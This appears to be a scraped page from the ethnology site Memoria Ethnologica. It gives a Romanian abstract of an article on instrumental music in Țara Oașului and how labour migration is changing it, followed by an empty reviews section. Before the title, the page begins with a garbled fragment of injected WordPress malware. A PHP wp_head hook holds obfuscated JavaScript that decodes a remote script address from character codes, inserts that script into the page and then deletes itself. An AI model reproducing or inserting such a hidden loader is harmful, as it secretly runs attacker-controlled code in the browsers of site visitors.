2,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} » Muzica instrumentală din Oaș, astăzi, sau O cronică fragmentată a glasurilor ce se pierd Muzica instrumentală din Oaș, astăzi, sau O cronică fragmentată a glasurilor ce se pierd | Memoria Ethnologica

Muzica instrumentală din Oaș, astăzi, sau O cronică fragmentată a glasurilor ce se pierd

Muzica instrumentală din Oaş, astăzi, sau O cronică fragmentată a glasurilor ce se pierd Rezumat Migraţia pentru muncă a afectat astăzi, în culturile ţărăneşti din România, şi în general din estul Europei, practici comunitare şi comportamente culturale modificându-le sau reformulându-le. Muzica tradiţională din Ţara Oaşului (nordul României) a rămas, totuşi, chiar după căderea comunismului, una extrem de viguroasă şi relativ incompatibilă cu utilizarea ei pe scară largă în cadrul culturii de masă comuniste şi, mai ales, în cultura media. O analiză exemplară a logicii producerii muzicii ca mecanism generativ a culturii (muzicale) locale din Oaş este volumul Din răsputeri, Glasuri şi cetere din Ţara Oaşului (2006), semnat de Jacques Bouët, Bernard Lortat-Jacob, Speranţa Rădulescu şi la care textul de faţă face referire, pentru a surprinde schimbările sociale şi culturale care au afectat Oaşul ca urmare a generalizării migraţiei pentru muncă. În centrul acestei incursiuni analitice cu valoare prospectivă se află problematica rememorării ca mecanism al producerii (şi reproducerii) culturii locale, în condiţiile socio-economice menţionate.

Recenzii

Nu există recenzii până acum.

Fii primul care adaugi o recenzie la „Muzica instrumentală din Oaș, astăzi, sau O cronică fragmentată a glasurilor ce se pierd”